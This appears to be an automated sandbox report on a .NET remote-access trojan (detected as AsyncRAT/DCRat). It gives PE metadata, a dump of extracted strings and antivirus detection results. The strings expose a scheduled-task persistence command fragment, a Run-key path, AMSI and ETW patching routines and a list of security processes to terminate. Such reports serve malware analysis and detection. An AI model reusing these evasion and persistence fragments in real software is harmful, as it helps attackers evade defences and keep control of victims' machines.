Static | ZeroBOX

PE Compile Time

2023-08-07 13:41:11

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x0000e904    0x0000ea00        5.8458582645
.rsrc   0x00012000       0x00000db5    0x00000e00        5.02370830067
.reloc  0x00014000       0x0000000c    0x00000200        0.0611628522412

Resources

Name         Offset      Size        Language      Sub-language     File type
RT_VERSION   0x000120a0  0x000002d4  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST  0x00012374  0x00000a41  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Q ^ i f
Action`10
InvalidParameter10
D84F4C120005F1837DC65C04181F3DA9466B123FC369C359A301BABC12061570
<>c__DisplayClass5_0
<>c__DisplayClass6_0
<PatchMem>b__0
<GetFiltes>b__0
<>p__0
AbandonedWait0
InvalidParameter11
IEnumerable`1
CallSite`1
List`1
InvalidParameter1
AbandonedWait1
InvalidParameter12
PROCESSENTRY32
Microsoft.Win32
ToUInt32
ReadInt32
ToInt32
SwapInt32
Func`2
X509Certificate2
InvalidParameter2
AbandonedWait2
<>o__53
AbandonedWait63
Func`3
InvalidParameter3
AbandonedWait3
E123F60E9FC6E974D1381F2F15FB19E7960628CC8925D65E344C2F2BDC64F424
WriteUInt64
ToUInt64
GetAsUInt64
SetAsUInt64
ToInt64
SwapInt64
InvalidParameter4
__StaticArrayInitTypeSize=5
CABAFE20CFEA6C92D3377C14650461E190857D48D13934B5562233C314AAFBB5
InvalidParameter5
InvalidImageWin16
ToUInt16
ReadInt16
ToInt16
SwapInt16
HMACSHA256
Aes256
aes256
__StaticArrayInitTypeSize=6
InvalidParameter6
InvalidParameter7
get_UTF8
InvalidParameter8
InvalidParameter9
<Module>
MessagePackLib.<PrivateImplementationDetails>
0C50C67E839472CD612D6033109F5E032987E48E367247F29C0EB30A1D3EB5FC
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
GetTypeFromCLSID
th32ModuleID
th32DefaultHeapID
th32ProcessID
th32ParentProcessID
get_FormatID
EXECUTION_STATE
87639126EA77B358F26532367DBA67C5310EF50A8D9888ED070CD40E1F605A8F
get_ASCII
LASTINPUTINFO
System.IO
IsServerOS
ES_CONTINUOUS
NTSTATUS
get_IV
set_IV
GenerateIV
PatchETW
value__
Camera
havecamera
NotMappedData
ReadServertData
PropertyData
NoTxfMetadata
PagefileQuota
mscorlib
ProcessInJob
ProcessNotInJob
DifferenceAtDc
BadInitialPc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
KernelApc
UserApc
dwProcessId
processId
ObjectPathSyntaxBad
EndRead
BeginRead
BlockThread
InnerAdd
RecoveryNotNeeded
PagefileQuotaExceeded
ArrayBoundsExceeded
SemaphoreLimitExceeded
SuspendCountExceeded
ThreadWasSuspended
SectionNotExtended
b64encoded
SHA256Managed
AccessDenied
RangeNotLocked
get_Enabled
set_Enabled
ServerDisabled
AccountDisabled
ServerNotDisabled
TimerNotCanceled
RequestCanceled
IoPrivilegeFailed
LogGrowthFailed
TransactionPropagationFailed
TmInitializationFailed
PrimaryTransportConnectFailed
Cancelled
FileRenamed
NotAllAssigned
TransactionNotJoined
Abandoned
ProcessCloned
MutantNotOwned
NoneMapped
SomeNotMapped
ProfilingNotStopped
RegistryRecovered
PasswordExpired
RollbackTimerExpired
FormsAuthRequired
SynchronizationRequired
CheckOutRequired
FileForcedClosed
FileClosed
HandlesClosed
PortClosed
PortConnectionRefused
VirusInfected
get_Connected
PipeConnected
get_IsConnected
set_IsConnected
PipeDisconnected
RmDisconnected
LpcReceiveBufferExpected
LogCorruptionDetected
ProcessIsProtected
FileDeleted
VirusDeleted
LockNotGranted
NotImplemented
VolumeMounted
ProfilingNotStarted
RmAlreadyStarted
Alerted
TransactionAlreadyAborted
CtlFileNotSupported
EasNotSupported
TooManyGuidsRequested
TooManyLuidsRequested
TransactionNotRequested
GuidsExhausted
LuidsExhausted
AgentsExhausted
RxActCommitted
NotCommitted
TransactionAlreadyCommitted
Received
TransactionalOpenNotAllowed
LpcRequestsNotAllowed
InvalidCid
InvalidSid
HandleNoLongerValid
StreamMiniversionNotValid
CurrentTransactionNotValid
TransactionRequestNotValid
FileInvalid
ObjectNameInvalid
ObjectPathInvalid
get_Guid
PrivilegeNotHeld
<SendSync>k__BackingField
<Enabled>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<ActivatePo_ng>k__BackingField
<Ping>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
InnerAddMapChild
InnerAddArrayChild
FloatDenormalOperand
Append
RegistryValueKind
ResourceDataNotFound
ResourceNameNotFound
ObjectNameNotFound
ResourceTypeNotFound
ProcedureNotFound
ObjectPathNotFound
OrdinalNotFound
DllNotFound
CrmProtocolNotFound
StreamMiniversionNotFound
EntryPointNotFound
method
IllFormedPassword
WrongPassword
Replace
NotSameDevice
NoSuchDevice
NoMediaInDevice
CreateInstance
source
exitCode
set_Mode
InvalidReadMode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
decode
utf8Encode
DeleteSubKeyTree
PageFaultGuardPage
SectionNotImage
BindToStorage
LpcInvalidConnectionUsage
cntUsage
get_Message
InvalidMessage
NoSuchPrivilege
WorkingSetLimitRange
EaTooLarge
FileTooLarge
DynamicAPIInvoke
DynamicInvoke
EndInvoke
BeginInvoke
DynamicFunctionInvoke
InstanceNotAvailable
PipeNotAvailable
IEnumerable
IDisposable
ToDouble
SwapDouble
InvalidHandle
RuntimeFieldHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
dwProcessHandle
WaitHandle
bInheritHandle
InvalidPortHandle
handle
WriteSingle
ToSingle
SetAsSingle
Install_File
szExeFile
EndOfFile
PageFaultPagingFile
NoSuchFile
DecodeFromFile
NoEasOnFile
SaveBytesToFile
TmVolatile
IsInRole
WindowsBuiltInRole
Console
GetActiveWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
DLLName
get_Name
InvalidEaName
get_FileName
set_FileName
GetTempFileName
GetFileName
fileName
get_ModuleName
get_MachineName
get_OSFullName
get_FullName
IsValidDomainName
FunctionName
PropName
get_UserName
InvalidComputerName
lowerName
SetName
InvalidAccountName
ExportName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
dwTime
WrongVolume
WriteLine
Combine
ManagementScope
ComInterfaceType
BadFileType
UriHostNameType
FunctionDelegateType
get_ValueType
valueType
OfType
MsgPackType
ProtocolType
GetType
SocketType
FileShare
Compare
System.Core
DInvokeCore
DllMightBeInsecure
LogonFailure
Server_signa_ture
ResourceInUse
TokenAlreadyInUse
ModuleBase
ReadOnlyCollectionBase
pcPriClassBase
ImageNotAtBase
Dispose
Reparse
DataLate
Certifi_cate
X509Certificate
Server_Certificate
ValidateServerCertificate
certificate
Create
MulticastDelegate
NothingToTerminate
InvalidPipeState
SetThreadExecutionState
CannotDelete
CallSite
PageFaultCopyOnWrite
TransactedMappingUnsupportedRemote
TransactionsUnsupportedRemote
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
InterfaceTypeAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
UnmanagedFunctionPointerAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
get_Value
DeleteValue
innerValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
RmNotActive
TransactionNotActive
DebuggerInactive
Remove
Client.exe
get_Size
cbSize
LogResizeInvalidSize
set_BlockSize
get_TotalSize
RegionSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
dwSize
set_KeySize
SizeOf
IndexOf
CantTerminateSelf
IID_IPropertyBag
strFlag
SectionTooBig
CryptoConfig
get_ActivatePo_ng
set_ActivatePo_ng
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
DeletePending
UTF8Encoding
System.Drawing.Imaging
PipeListening
System.Runtime.Versioning
Warning
FromBase64String
ToBase64String
ReadString
DownloadString
WriteString
ToString
get_AsString
set_AsString
BytesAsString
GetAsString
SetAsString
GetString
BytesAsHexString
Substring
PipeClosing
ThreadIsTerminating
ProcessIsTerminating
ClearSetting
System.Drawing
CouldNotResizeLog
ErrorLog
set_ErrorDialog
ObjectTypeMismatch
InfoLengthMismatch
RevisionMismatch
RemoteFileVersionMismatch
x64_am_si_patch
x86_am_si_patch
x64_etw_patch
x86_etw_patch
RecursiveDispatch
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
HmacSha256Length
get_Length
IvLength
AuthKeyLength
EndsWith
Patcham_si
PtrToStringAnsi
msgpackObj
listObj
MessagePackLib.MessagePack
MsgPack
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
unpack_msgpack
BadStack
BadInitialStack
FloatStackCheck
RegistryKeyPermissionCheck
FlushFinalBlock
StopBlock
StartBlock
strVal
RtlSetProcessIsCritical
ProcessCritical
Marshal
NetworkCredential
Informational
System.Security.Principal
WindowsPrincipal
AreEqual
get_Interval
set_Interval
InvalidAcl
BadInheritanceAcl
InvalidVolumeLabel
ImpersonationLevel
BufferTooSmall
In_stall
Client.Install
kernel32.dll
user32.dll
ntdll.dll
DiskFull
WriteNull
SetAsNull
MutexControl
Unsuccessful
DirectoryNotRm
UnableToFreeVm
Encode2Stream
FileStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
Program
PatchMem
get_Item
get_Is64BitOperatingSystem
Client.Algorithm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
ICryptoTransform
CLSID_SystemDeviceEnum
MsgPackEnum
ICreateDevEnum
WriteBoolean
ToBoolean
SetAsBoolean
HwidGen
NoImpersonationToken
NoToken
CantRecoverWithHandleOpen
children
TransactionsNotFrozen
X509Chain
AppDomain
get_CurrentDomain
Paste_bin
IsAdmin
LastAdmin
Ver_sion
ObjectNameCollision
UnknownRevision
GetFileNameWithoutExtension
get_OSVersion
NoSuchLogonSession
System.IO.Compression
Application
System.Security.Authentication
GuardPageViolation
SharingViolation
AccessViolation
set_Impersonation
FloatInvalidOperation
InvalidWorkstation
MiniversionInaccessibleFromSpecifiedTransaction
InvalidTransaction
EfsNotAllowedInTransaction
CannotExecuteFileInTransaction
UnableToDeleteSection
System.Reflection
PropertyDataCollection
ProcessModuleCollection
X509CertificateCollection
ManagementObjectCollection
Client.Connection
InvalidPageProtection
SectionProtection
PasswordRestriction
AccountRestriction
IllegalFunction
function
PrivilegedInstruction
IllegalInstruction
PageFaultTransition
set_Position
position
CallingConvention
TransactionRequiredPromotion
CryptographicException
DllNotFoundException
MissingMethodException
NonContinuableException
ArgumentNullException
InvalidOperationException
get_InnerException
ManagementException
ArgumentException
StringComparison
DataOverrun
Unknown
ImageCodecInfo
SendInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
PageFaultDemandZero
MappedFileSizeZero
IntegerDivideByZero
FloatDivideByZero
IncompatibleFileMap
WriteMap
PreventSleep
SingleStep
CrashDump
LongJump
currentApp
Microsoft.CSharp
NotifyCleanup
NoSuchGroup
SpecialGroup
MemberInGroup
MemberNotInGroup
InvalidPrimaryGroup
MembersPrimaryGroup
NormalStartup
System.Linq
InvalidSecurityDescr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Install_Folder
IdSender
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
GetEncoder
get_Buffer
set_Buffer
TransactionInvalidMarshallBuffer
WriteInteger
get_AsInteger
set_AsInteger
GetAsInteger
SetAsInteger
ManagementObjectSearcher
IMoniker
IEnumMoniker
ppEnumMoniker
moniker
SessionEndingEventHandler
InvalidOwner
Client.Helper
isVM_by_wim_temper
ToUpper
NoSuchUser
SpecialUser
CurrentUser
InvalidParameter
StreamWriter
TextWriter
GetDelegateForFunctionPointer
BitConverter
LogonServer
ToLower
NotifyEnumDir
EnlistmentNotSuperior
DataError
CrcError
InPageError
InternalError
EaCorruptError
IEnumerator
CreateClassEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
cntThreads
TooManyThreads
NativeMethods
Microsoft.VisualBasic.Devices
FindDevices
System.Runtime.InteropServices
System.Runtime.CompilerServices
InsufficientResources
DebuggingModes
set_EnablePrivileges
Matches
NoMoreEntries
get_Properties
ExpandEnvironmentVariables
TooManyOpenedFiles
NoMoreFiles
TooManyPagingFiles
get_Modules
System.Runtime.InteropServices.ComTypes
GetProcesses
ConflictingAddresses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Delegates
GetFiltes
Encode2Bytes
GetUtf8Bytes
utf8Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetAsBytes
SetAsBytes
GetBytes
rawBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
esFlags
dwFlags
InitializeSettings
SessionEndingEventArgs
Anti_Analysis
RunAntiAnalysis
ICredentials
set_Credentials
Equals
SslProtocols
ReadTools
WriteTools
BytesTools
System.Windows.Forms
CantCreateMoreStreamMiniversions
System.Collections
ConnectionOptions
StringSplitOptions
RemoveLastChars
FileLockedWithOnlyReaders
GetImageDecoders
EnumMonikers
RuntimeHelpers
Parameters
FileLockedWithWriters
NoLogonServers
SslPolicyErrors
sslPolicyErrors
InvalidLogonHours
InvalidInfoClass
CallbackBypass
dwDesiredAccess
FileAccess
Success
Anti_Process
TerminateProcess
AntiProcess
KillProcess
ThreadNotInProcess
OpenProcess
GetCurrentProcess
IPAddress
InvalidAddress
GetLoadedModuleAddress
get_BaseAddress
GetExportAddress
GetLibraryAddress
OpLockBreakInProgress
Compress
Decompress
Por_ts
Hos_ts
System.Net.Sockets
set_Arguments
SystemEvents
ObjectNameExists
GroupExists
ObjectNoLongerExists
UserExists
TransactionSuperiorExists
CrmProtocolAlreadyExists
Antivirus
MaximumNtStatus
Concat
InvalidImageLeFormat
InvalidImageFormat
format
WriteFloat
get_AsFloat
set_AsFloat
GetAsFloat
SetAsFloat
FindObject
ManagementBaseObject
ReparseObject
ForcePathObject
ReleaseComObject
ManagementObject
object
Collect
Connect
Reconnect
OldProtect
InvalidImageProtect
NewProtect
FileLockConflict
TransactionalConflict
System.Net
TransactionScopeCallbacksNotSet
PortNotSet
PortAlreadySet
Target
target
KeepAlivePacket
ClientSocket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
CantWait
op_Explicit
BadWorkingSetLimit
CommitmentLimit
ControlCExit
ClientOnExit
get_Default
FirstOrDefault
IAsyncResult
FloatInexactResult
result
WebClient
InitializeClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
DatatypeMisalignment
Environment
parent
System.Collections.IEnumerator.Current
System.Collections.IEnumerator.get_Current
GetCurrent
TxfMetadataAlreadyPresent
CantOpenMiniversionWithModifyIntent
EaListInconsistent
FileIdentityNotPersistent
get_RemoteEndPoint
Breakpoint
get_Count
get_ProcessorCount
SpecialAccount
NoQuotasForAccount
amount
CreateToolhelp32Snapshot
hSnapshot
GetPathRoot
RmMetadataCorrupt
TxfAttributeCorrupt
Decrypt
Encrypt
ParameterizedThreadStart
Convert
FailFast
InvalidDeviceRequest
ToList
IndoubtTransactionsExist
MessageLost
Process32First
FileCheckedOut
IoTimeout
Process32Next
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
NotMappedView
GetForegroundWindow
set_CreateNoWindow
FloatUnderflow
BufferOverflow
IntegerOverflow
FloatOverflow
CloseMutex
CreateMutex
InvalidParameterMix
IBindCtx
De_lay
WirteArray
InitializeArray
MsgPackArray
ToArray
get_AsArray
refAsArray
CantBreakTransactionalDependency
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
_authKey
masterKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
PartialCopy
CantCrossRmBoundary
WriteBinary
ToBinary
library
ObjectQuery
SelectQuery
CLSID_VideoInputDeviceCategory
category
NtProtectVirtualMemory
NoMemory
CantDisableMandatory
get_SystemDirectory
NonExistentEaEntry
SetRegistry
DeviceBusy
PipeBusy
op_Equality
op_Inequality
InvalidSubAuthority
InvalidIdAuthority
System.Net.Security
WindowsIdentity
PipeEmpty
IsNullOrEmpty
TxfDirNotEmpty
VolumeDirty
InvalidImageNotMz
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
ControlThread
WrapNonExceptionThrows
1.0.7.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
$29840822-5B84-11D0-BD3B-00A0C911CE86
$55272A00-42CB-11CE-8135-00AA004BB851
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.7.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
<dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">PerMonitorV2, PerMonitor</dpiAwareness>
<longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
SHA256
%AppData%
Pac_ket
Message
plu_gin
save_Plugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
UmVjZWl2ZWQ=
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
@echo off
timeout 3 > NUL
START "" "
" /f /q
Install Failed :
Taskmgr.exe
ProcessHacker.exe
procexp.exe
MSASCui.exe
MsMpEng.exe
MpUXSrv.exe
MpCmdRun.exe
NisSrv.exe
ConfigSecurityPolicy.exe
MSConfig.exe
Regedit.exe
UserAccountControlSettings.exe
taskkill.exe
\\{0}\root\CIMV2
SELECT * FROM Win32_OperatingSystem
ProductType
Select * from Win32_CacheMemory
{860BB310-5D01-11d0-BD3B-00A0C911CE86}
{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
{55272A00-42CB-11CE-8135-00AA004BB851}
FriendlyName
Err HWID
ClientInfo
Microsoft
Camera
Version
Perfor_mance
Paste_bin
Anti_virus
Install_ed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Unknown
Environment
windir
Software
Classes
mscfile
ms-settings
, Dll was not found or not loaded.
Failed to parse module exports.
, export not found.
Could not get the handle for the function.
ntdll.dll
NtProtectVirtualMemory
not found.
[!] {0}
YW1zaS5kbGw=
AmsiScanBuffer
EtwEventWrite
Software\
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
DcRatByqwqdanchun
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.7.0
InternalName
Client.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Client.exe
ProductName
ProductVersion
1.0.7.0
Assembly Version
1.0.7.0
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
DrWeb BackDoor.AsyncRATNET.3
MicroWorld-eScan Generic.Dacic.6C2EA08B.A.6276D508
ClamAV Win.Packed.Razy-9807129-0
CMC Clean
CAT-QuickHeal Backdoor.AsyncratFC.S22017128
McAfee GenericRXOW-GX!3500D4B2B971
Malwarebytes Generic.Malware.AI.DDS
VIPRE Generic.Dacic.6C2EA08B.A.6276D508
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Clean
BitDefender Generic.Dacic.6C2EA08B.A.6276D508
K7GW Clean
Cybereason Clean
BitDefenderTheta Gen:NN.ZemsilF.36348.dm0@a8zJXug
VirIT Trojan.Win32.MSIL_Heur.A
Cyren W32/Trojan.IML.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Agent.CFQ
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.MSIL.Agent.gen
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Backdoor.AsyncRAT!1.C3F4 (CLASSIC)
TACHYON Clean
Sophos Troj/AsyncRat-B
F-Secure Heuristic.HEUR/AGEN.1307404
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.km
Trapmine Clean
FireEye Generic.mg.3500d4b2b9714996
Emsisoft Trojan.Agent (A)
Ikarus Trojan.MSIL.Agent
GData MSIL.Backdoor.DCRat.C
Jiangmin Clean
Webroot Clean
Avira HEUR/AGEN.1307404
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.Dacic.6C2EA08B.A.6276D508
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.Agent.gen
Microsoft Backdoor:MSIL/AsyncRAT.X!MTB
Google Detected
AhnLab-V3 Backdoor/Win.AsyncRAT.R511399
Acronis suspicious
VBA32 Trojan.MSIL.DarkCrystal.Heur
ALYac Generic.Dacic.6C2EA08B.A.6276D508
MAX malware (ai score=87)
DeepInstinct MALICIOUS
Cylance unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Trojan.Msil.Agent.zan
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Agent.CFQ!tr
AVG Win32:BackdoorX-gen [Trj]
Avast Win32:BackdoorX-gen [Trj]
CrowdStrike win/malicious_confidence_100% (D)
No IRMA results available.